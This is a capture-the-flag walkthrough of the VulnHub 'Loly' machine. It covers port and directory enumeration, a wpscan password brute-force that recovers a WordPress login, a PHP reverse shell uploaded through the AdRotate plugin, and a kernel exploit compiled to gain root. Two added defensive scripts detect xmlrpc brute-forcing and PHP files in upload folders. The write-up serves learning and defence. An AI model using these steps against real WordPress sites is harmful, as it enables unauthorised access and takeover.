Initial Enumeration

I started with Nmap to look for open ports and default scripts.

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ nmap -sC -sV -oN nmap/initial 192.168.1.2 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-22 14:17 IST
Nmap scan report for 192.168.1.2
Host is up (0.0036s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds

We can see that only port 80 is open, so let's open up our browser and enumerate port 80.

We can see the default nginx page. Next, I performed a gobuster scan to look for hidden directories.

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ gobuster dir -u http://192.168.1.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.2
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/09/22 14:20:16 Starting gobuster
===============================================================
/wordpress (Status: 301)
===============================================================
2020/09/22 14:22:54 Finished
===============================================================

We can see a /wordpress directory. When we try to open it in the web browser, it gives us the hostname loly.lc, so I added it to my /etc/hosts file.

┌──(madhav㉿kali)-[~]
└─$ cat /etc/hosts              
127.0.0.1       localhost
127.0.1.1       kali
192.168.1.2     loly.lc

Next I used wpscan to enumerate users and look for vulnerable plugins.

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ wpscan --url http://loly.lc/wordpress --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://loly.lc/wordpress/ [192.168.1.2]
[+] Started: Tue Sep 22 15:41:49 2020

 ...

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] loly
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

 ...

We have a user named loly, so I used wpscan again to brute-force the password for the user loly with rockyou.txt.

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ wpscan --url http://loly.lc/wordpress --usernames loly --passwords /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://loly.lc/wordpress/ [192.168.1.2]
[+] Started: Tue Sep 22 15:43:43 2020


...

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando

[!] Valid Combinations Found:
 | Username: loly, Password: fernando

...

Hurray, we found a valid combination. I logged into the WordPress panel using the username loly and the password fernando.
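A defender-side counterpart to the XML-RPC password attack above, added here as an example and not part of the original walkthrough: it parses nginx combined-format access log lines (a constructed sample) and flags clients that burst POSTs to xmlrpc.php, the endpoint wpscan used. The log format, the threshold and the time window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample nginx access log (combined format), not from the original post:
# one client hammers xmlrpc.php while another browses normally.
SAMPLE_LOG = """\
192.168.1.5 - - [22/Sep/2020:15:43:43 +0530] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 1188 "-" "WPScan v3.8.6"
192.168.1.7 - - [22/Sep/2020:15:43:43 +0530] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.1.5 - - [22/Sep/2020:15:43:44 +0530] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 1188 "-" "WPScan v3.8.6"
192.168.1.5 - - [22/Sep/2020:15:43:44 +0530] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 1188 "-" "WPScan v3.8.6"
192.168.1.7 - - [22/Sep/2020:15:43:45 +0530] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 412 "-" "Jetpack"
192.168.1.5 - - [22/Sep/2020:15:43:45 +0530] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 1188 "-" "WPScan v3.8.6"
192.168.1.5 - - [22/Sep/2020:15:43:46 +0530] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 1188 "-" "WPScan v3.8.6"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, user_agent), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?")[0], m["ua"]

def find_xmlrpc_bursts(log_text, threshold=5, window_seconds=60):
    """Return {ip: total_posts} for clients that POST to xmlrpc.php at least
    `threshold` times inside any `window_seconds` span. One POST can carry many
    password guesses via system.multicall, so the threshold is kept low."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].endswith("/xmlrpc.php"):
            posts[rec[0]].append(rec[1])
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged
```

On a real server, point it at the nginx access log and feed the flagged addresses to a rate limit or fail2ban-style jail.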

Initial Foothold

The next step is to get a shell on the box. For this, I saw that we have a plugin named "AdRotate" installed, which lets us upload a zip file.

http://loly.lc/wordpress/wp-admin/admin.php?page=adrotate-media

I used the php-reverse-shell from pentestmonkey. I compressed it into a zip file and uploaded it to the machine. After uploading it, I executed it using the following command:

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ curl -v http://loly.lc/wordpress/wp-content/banners/rev.php

Once I got the reverse shell, I started enumerating and found a database password in the wp-config.php file.

I used this password to log in as user loly.
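An added example, not code from the original post or from the AdRotate plugin: an audit that walks a WordPress upload path such as wp-content/banners and reports PHP files, or files of any extension that carry a PHP open tag. The directory tree, file names and contents are constructed for the demonstration.

```python
import os
import re
import tempfile

# Extensions the web server would hand to the PHP interpreter; assumed list.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar"}
# A PHP open tag anywhere in the first few KB marks a script disguised as media.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def find_script_uploads(root):
    """Return sorted relative paths under `root` that have a script extension
    or whose leading bytes contain a PHP open tag."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as f:
                head = f.read(4096)
            if ext in SCRIPT_EXTS or PHP_TAG.search(head):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)

def build_sample_tree():
    """Construct a throwaway wp-content/banners tree: one real image header,
    one plainly named PHP file, and one image-named file hiding a PHP tag."""
    root = tempfile.mkdtemp()
    banners = os.path.join(root, "wp-content", "banners")
    os.makedirs(banners)
    with open(os.path.join(banners, "ad.png"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 64)
    with open(os.path.join(banners, "rev.php"), "wb") as f:
        f.write(b"<?php /* constructed placeholder, not a real payload */ ?>")
    with open(os.path.join(banners, "promo.jpg"), "wb") as f:
        f.write(b"\xff\xd8\xff<?php echo 'not an image'; ?>")
    return root

if __name__ == "__main__":
    for rel in find_script_uploads(build_sample_tree()):
        print("script found in upload path:", rel)
```

Run it from cron against the real upload directories, and pair it with a web-server rule that refuses to execute PHP under those paths so an uploaded script is inert even before it is found.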

Root Shell

The root part is quite easy. If we check the OS info, we can see that it is using an older kernel version that is vulnerable to many exploits.

loly@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

You can exploit this using many exploits available on the internet. I decided to go with this exploit. Just compile it and execute it after giving it the correct permissions.

loly@ubuntu:~$ gcc 45010.c -o exploit
loly@ubuntu:~$ chmod +x exploit && ./exploit

Hurray! We are root, and now we can read the flag present in the root directory.

root@ubuntu:~# cat /root/root.txt 
  ____               ____ ____  ____  
 / ___| _   _ _ __  / ___/ ___||  _ \ 
 \___ \| | | | '_ \| |   \___ \| |_) |
  ___) | |_| | | | | |___ ___) |  _ < 
 |____/ \__,_|_| |_|\____|____/|_| \_\
                                      
Congratulations. I'm BigCityBoy

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Joshua Sun.